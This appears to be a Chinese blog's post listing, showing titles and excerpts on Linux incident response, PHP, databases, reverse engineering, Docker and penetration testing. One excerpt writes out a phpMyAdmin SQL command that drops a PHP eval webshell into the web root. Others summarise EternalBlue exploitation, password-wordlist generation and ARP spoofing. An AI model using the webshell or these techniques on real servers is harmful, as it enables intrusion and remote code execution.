- 博客(422)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 linux系统应急响应排查手册
linux系统应急响应排查手册系统登陆日志/var/log/wtmp //登陆成功的信息,包括用户登录、注销及系统的启动、停机的事件/var/log/btmp //登陆失败的信息/var/run/utmp //正在登陆的信息/var/log/secure //系统认证信息日志,包括用户登陆成功、登陆失败日志wtmplast -f /var/log/wtmplast//登陆...
2021-08-04 16:44:00
533
原创 Sublime Text中输入python代码,不能执行问题解决
Sublime Text中输入python代码,不能执行问题解决问题问题:在Sublime Text中输入print("hello world") 无法输出值;在CMD输入python,python可以执行,并且环境变量正常;解决第一步:查看自己的python的安装路径;C:\Users\14158>pythonPython 3.8.1 (tags/v3.8.1:1b293...
2021-08-01 18:05:00
5032
3
原创 永恒之蓝——windows server 2003 漏洞
永恒之蓝——windows server 2003 漏洞作业参考作业参考2一、永恒之蓝简述:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构...
2021-07-07 11:27:00
4204
原创 数据库学习记录02
数据库的操作02 SQL语言SQL1.什么是SQL ?Structured Query Languange:结构化查询语言其实就是定义了操作所有关系型数据库的规则。每一种数据库操作的方式存在不一样的地方,称为“方言”。2.SQL通用语法SQL语句可以单行或多行书写,以分号结尾。可使用空格和缩进来增强语句的可读性。MySQL数据库的SQL 语...
2021-06-08 11:39:00
359
2
原创 数据库学习记录01
数据库学习记录 数据库的位置和地位数据库种类数据库简介SQL 是用于访问和处理数据库的标准的计算机语言。SQL (Structured Query Language:结构化查询语言) 是用于管理关系数据库管理系统(RDBMS)。 SQL 的范围包括数据插入、查询、更新和删除,数据库模式创建和修改,以及数据访问控制。关系型数据库包括:MySQL、SQL...
2021-06-08 10:09:00
214
1
原创 PHP学习记录02
PHP学习记录02PHP 表单验证参考:https://www.runoob.com/php/php-form-validation.html第一步开启环境:phpstudy、Sublime TEXT、浏览器、操作系统 <!DOCTYPE HTML> <html> <head> <meta charset="utf-8">...
2021-06-08 09:59:00
301
原创 PHP学习记录03
php高级教程03 date() date函数PHP date() 函数可把时间戳格式化为可读性更好的日期和时间。语法string date ( string $format [, int $timestamp ] )参数描述format必需。规定时间戳的格式。timestamp可选。规定时间戳。默认是当前的日期和时间。...
2021-06-08 09:45:00
168
原创 PHP学习记录01
PHP学习记录对于语言类的学习,选择好一门你感兴趣的语言种类,去学精它,语言不在多,而在精。C++、C语言这些术语强类型语言,较难。这些语言,大家至少掌握一门。java、python、php、js、jsp、GO、。。。HTML、CSS、XML。。。SQL。。。PHP中文无法识别,和php版本相关,切换php版本查看问题;PHP简介PHP(全称:PHP:Hypertext Pre...
2021-06-07 17:01:00
430
原创 CTF-前期资源收集
CTF-前期资源收集ctf比赛/学习资源整理,记得收藏!https://mp.weixin.qq.com/s/JSINcOxv6qwuypm_hWuzxwCTF资料总结、各种在线靶场题库、实验靶场、各大赛writeup()https://mp.weixin.qq.com/s/gAtSOdzMJd8s6y8l4aqWmQCTF工具大合集(4.5G)https://mp.weixin.qq.c...
2021-06-07 11:54:00
173
原创 Http协议答疑
Http协议答疑1、说一下什么是Http协议?对器客户端和 服务器端之间数据传输的格式规范,格式简称为“超文本传输协议”。2、什么是Http协议无状态协议?怎么解决Http协议无状态协议?无状态协议对于事务处理没有记忆能力。缺少状态意味着如果后续处理需要前面的信息无状态协议解决办法: 通过1、Cookie 2、通过Session会话保存。3、说一下Http协议中302状态ht...
2021-05-13 11:41:00
171
原创 加壳与脱壳理论详解
加壳与脱壳理论详解 在自然界中,我想大家对壳这东西应该都不会陌生了,由上述故事,我们也可见一斑。自然界中植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的 “ 壳中带籽 ” 的壳)。由于这段程...
2021-05-13 10:42:00
3190
原创 汇编指令汇总
汇编指令汇总一、数据传输指令它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. 1. 通用数据传送指令. MOV 传送字或字节. MOVSX 先符号扩展,再传送. MOVZX 先零扩展,再传送. PUSH 把字压入堆栈. POP 把字弹出堆栈. PUSHA 把AX,CX,DX...
2021-05-10 11:51:00
2679
1
原创 逆向实验小结
逆向实验小结OllyDbg:修改程序标题正常画面查找需要修改的值查找需要修改的值,查找用Ctrl+G来查找栈值。修改数据修改数据,选取值后 空格 修改;保存文件另存为一个新的可执行文件。查看结果...
2021-04-30 10:26:00
255
1
原创 linux eth0配置ip地址
linux eth0配置ip地址对eth0网卡配置有两种方法,一是临时配置、二是永久配置,下面分别介绍:一、 临时配置eth0 的ip 和子网掩码,一旦重启即失效。 1.1使用ifconfig命令配置,命令如下:ifconfig eth0 192.168.199.111 netmask 255.255.255.0 1.2 使用route命令配置网关,命令如...
2021-04-28 18:15:00
9314
1
原创 逆向之利用地址覆盖执行Shellcode
逆向之利用地址覆盖执行ShellcodeShellcodeShellcode定义 Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码一般可以获取权限。 Shellcode的作用 Shellcode一般是作为数据发送给受攻击服务器的。Shellcode是溢出程序和蠕虫病毒的核心提到它自然就会和漏洞联想在一起。漏洞利用中最关键的是Shel...
2021-04-26 16:58:00
344
原创 逆向之异常处理机制分析
逆向之异常处理机制分析异常处理简介异常处理概念 是编程语言或计算机硬件里的一种机制,用于处理软件或信息系统中出现的异常状况(即超出程序正常执行流程的某些特殊条件)异常处理的方法 异常处理使用try、catch和finally关键字来尝试可能未成功的操作,处理失败,以及在事后清理资源。异常处理作用 通过异常处理 可以对用户在程序中的非法输入进行控制和提示,以防程序崩...
2021-04-26 16:01:00
427
原创 逆向之虚函数执行分析
逆向之虚函数执行分析同名函数调用函数重复定义: 在C++中,同一类中是不能定义两个名字相同、参数个数和类型都相同的函数的,否则就是“重复定义”不同层次的函数调用: 在类的继承层次结构中在不同的层次中可以出现名字相同、参数个数和类型都相同而功能不同的函数。编译系统按照同名覆盖的原则决定调用的对象。虚函数虚函数的定义: 虚函数的作用是允许在派生类中重新定义与基类同名...
2021-04-26 15:19:00
180
原创 逆向之密码破解
逆向之密码破解OllyDbg介绍OllyDbg的功能 OllyDbg提供程序动态调试的功能,可以在程序运行过程中修改汇编指令OllyDbg的转移指令 在利用OllyDbg分析程序的过程中, “转移指令”就是在程序判断符合特定条件的情况下使程序发生跳转。 “转移指令”通常是分析程序的突破口。常见的转移指令 (1)无条件转移指令(长转移) (2)条件转移指令(短转移...
2021-04-26 14:40:00
877
1
原创 逆向之整数溢出漏洞
逆向之整数溢出漏洞溢出漏洞的简介溢出漏洞的概念: 溢出是黑客利用程序的漏洞,专门开发的一种程序,加相应的参数运行后,就可以达到某种目的。溢出是程序设计者设计时的不足所带来的错误溢出的类型: 溢出分为缓冲区溢出、 内存溢出、数据溢出等整数的概念整数的分类: 在计算机中,整数分为无符号整数以及有符号整数两种数据在计算机中的存储方式: 数据在计算机中的存储方...
2021-04-26 11:50:00
487
原创 逆向之函数栈帧结构分析
逆向之函数栈帧结构分析函数的简介函数的定义 计算机的函数,是一个固定的一个程序段,或称其为一个子程序,它在可以实现固定运算功能的同时,还带有一个入口和一个出口。函数的入口: 函数的入口,就是函数所带的各个参数,我们可以通过这个入口,把函数的参数值代入子程序供计算机处理。函数的出口: 函数的出口,就是指函数的函数值,在计算机求得之后,由此口带回给调用它的程序函数...
2021-04-26 11:02:00
235
原创 逆向之程序堆栈
逆向之程序堆栈计算机内存分布计算机内存:计算机内存分为数据段、代码段、堆段和栈段。堆和栈在数据结构中是两种不同的数据结构。两者都是数据项按序排列的数据结构。栈栈的定义:后进先出的数据结构。栈的存取规则:后存放的先取先存放的后取,类似于取放在箱子底部的东西,首先要移开压在它上面的物体堆堆的定义堆是一种经过排序的树形数据结构,每个节点都有一个值。通常我们所说的堆的数据结...
2021-04-26 10:55:00
263
原创 逆向之汇编语言
逆向之汇编语言 首先介绍计算机程序在计算机中的处理过程。 现代计算机存储和处理的信息以二值信号表示,也就是二进制序列,程序对于计算机而言就是一串二进制数据流,以流水线的方式进入CPU进行运算。主要在CPU与内存之间进行数据传递。但程序员写出来的程序是以高级语言的形式展现的,计算机不是人脑,看不懂高级语言的语法,只能识别二进制序列,所以计算机需要将高级语言翻译成二进制序列进行解读和执行。然而...
2021-04-26 09:50:00
1807
原创 批处理命令
批处理命令一、基础语法:1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。可以使用任何文本文件编辑工具创建和修改。2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环。3.批处理的编程能力远不如C语言等编程语言,也十分不规范。4.每个编写好的批处理文件都相当于一个DOS的外部命令,把它所在的目录放到DOS搜索路径(p...
2021-04-23 19:49:00
1677
原创 windows中echo的用法
windows中echo的用法tree1.echo:显示信息echo hello执行显示:hello2.echo on/off:开/关回显功能如果将@echo off放最前面,将不会显示所有命令本身,只显示输出结果@echo off echo hello world! echo Hi everyone!执行显示:hello world!Hi every...
2021-04-23 19:44:00
13256
原创 通过phpMyAdmin写入MySQL,获取webshell
通过phpMyAdmin写入MySQL,获取webshell在SQL的控制台中输入进入http://127.0.0.1/phpMyAdmin,并在SQL中输入如下命令select '<?php @eval($_POST[1]);?>' into outfile 'D:/phpstudy_pro/WWW/code/sql/shell.php';发现如下报错:修改配置...
2021-04-19 23:35:00
238
原创 底部小鱼特效
底部小鱼特效页面定制 CSS 代码.container { width: 100%; height: 200px; position: fixed; z-index: -1; bottom: 0; left: 0;}页脚 HTML 代码 <!-- 底部小鱼 --> <div id="jsi-flying...
2021-04-18 20:39:00
1245
1
原创 kali Linux的简单介绍
kali Linux的简单介绍Kali Linux是基于Debian 的Linux发行版,设计用于数字取证操作系统。Back Track是他们之前写的用于取证的Linux发行版。Kali Linux预装了许多渗滲透测试软件,包括nmap 、 Wireshark 、 John the Ripper, Kali Linux。以及Aircrack-ng.用户可通过硬盘、Iive CD或Iive US...
2021-04-12 11:52:00
2360
原创 Kali安装gmpy2
Kali安装gmpy2需要的依赖库 gmp mpfr mpcgmp 库安装apt-get install libgmp-devmpfr 库安装apt-get install libmpfr-devmpc 库安装apt-get install libmpc-devpip安装apt-get install python3-pipgmpy安装pip insta...
2021-04-12 11:43:00
582
原创 利用kali生成字典的三种方式
利用kali生成字典的三种方式字典是记录一些特殊或有目的性的密码集合,通常以txt格式进行记录保存。在渗透许多服务器、smb、ftp、ssh、远程桌面rdp、网页后台等一些用户登录时,没有正确密码,使用密码字典爆破就是最直接的黑客攻击方法一:使用cupp工具生成1.下载github资源git clone https://github.com/Mebus/cupp.git2.运行c...
2021-04-09 15:37:00
15604
原创 永恒之蓝(ms017-010)漏洞利用
永恒之蓝(ms017-010)漏洞利用1、实验环境靶机win7地址:192.168.1.xxx登录密码:xxxx攻击机:kaillinux地址:192.168.1.xxx登录用户名:root登录密码:xxx2、实验原理:“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器。445端口简介: 445端口是一个毁誉参半的端口,有了它我们可以...
2021-04-09 10:04:00
1633
1
原创 逆向之OllyDbg调试细则
逆向之OllyDbg调试细则快捷键转载OllyDbg 窗口通用快捷键快捷键 功能 Ctrl + F2重启程序,即重新启动被调试程序( 重新载入程序 )。如果当前没有调试的程序,OllyDbg会运行历史列表[historylist]中的第一个程序。程序重启后,将会删除所有内存断点和硬件断点。译者注:从实际使用效果看,硬件断点在程序重启后并没有移除。Alt ...
2021-04-07 10:31:00
538
原创 如何使用最新Microsoft Edge打开Flash页面
如何使用最新Microsoft Edge打开Flash页面使用最新版本的IE浏览器无法打开flash相关的页面,有关最新版本的谷歌内核相关浏览器都出现相关问题.flash的设置都找不到.以下是解决最新IE浏览器打开flash的方法,仅供参考.第一步:打开最新IE浏览器点击设置,-->点击默认浏览器-->选择Internet Explorer始终允许选择默认浏览器设置Interne...
2021-04-06 15:30:00
70464
3
原创 PHP+mysql的登陆与注册
PHP+mysql的登陆与注册图1:图2:图3:教程:实现这个功能我们需要五个php文件:login.php(登录界面,如图2)<!DOCTYPE html><html><head><title>登录</title><meta name="content-type"; charset="UTF-8"><...
2021-04-06 13:30:00
597
原创 Docker学习笔记02
Docker学习笔记02Docker镜像讲解镜像是什么镜像是一种轻量级,可执行的独立软件,用来打包软件运行环境和基于运行环境开发的软件,他包含运行某个软件所需的所有内容,包括代码、运行环境、库、环境变量和配置文件。所有的应用,直接打包docker镜像,就可以直接跑起来!如何得到镜像从远程仓库下载朋友拷贝给你自己制作一个镜像DockerFileDocker镜像加载...
2021-04-06 11:33:00
157
原创 Docker学习笔记01
Docker学习笔记01Docker学习Docker的概述Docker的安装Docker的命令镜像命令容器命令操作命令。。。Docker镜像容器数据卷DockerFileDocker网络原理IDEA整合DockerDocker Compose'Docker SwarmCI\CD Jenkin...
2021-04-06 11:08:00
331
原创 AWVS工具站点扫描-基础知识点
AWVS工具站点扫描--基础知识点自动化的web扫描工具基本使用http请求包http请求方法http---GET请求头http响应体模糊测试执行过程Sniffer工具SQL注入finder功能常见的端口中间件...
2021-04-06 10:19:00
260
原创 Vmware中桥接模式连不上网但是net模式可以解决方法
Vmware中桥接模式连不上网但是net模式可以解决方法首先看一下自己的虚拟网卡的配置:然后再到Vmware的网络配置中设置一下桥接模式的网卡配置这里大家先选择一下 wifi网卡的设置,发现并没有啥用,然后再选择自动桥接,就可以了(这个我也不知道是啥原因,因为我之前就是自动桥接的,但是左右横跳一下就好了,很玄学)最后确定并退出...
2021-03-27 14:16:00
985
原创 ARP地址欺骗
ARP地址欺骗Arp欺骗攻击利用ARP协议的缺陷进行的一种非法攻击ARP协议地址解析协议,将IP地址转换为对应的mac地址,属链路层协议数据包分为:请求包(广播):本机IP地址、mac地址+目标主机IP地址应答包(单播):本机IP地址、mac地址+来源主机IP地址、mac地址通信方式:主机A和主机B通信过程:ARP欺骗攻击的检测与防御检测:1、网络频繁掉线2、网速突然...
2021-03-18 15:54:00
1622
原创 centos7 防火墙开启端口
centos7 防火墙开启端口说明:刚刚使用systemctl start firewalld命令开启防火墙的时候,却开不成功,出现Failed to start firewalld.service: Unit is masked的错误,经过搜索下后,发现是firewalld服务被锁定了,这里说下方法。方法执行命令,即可实现取消firewalld的锁定systemctl unmask ...
2021-03-11 11:50:00
449
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人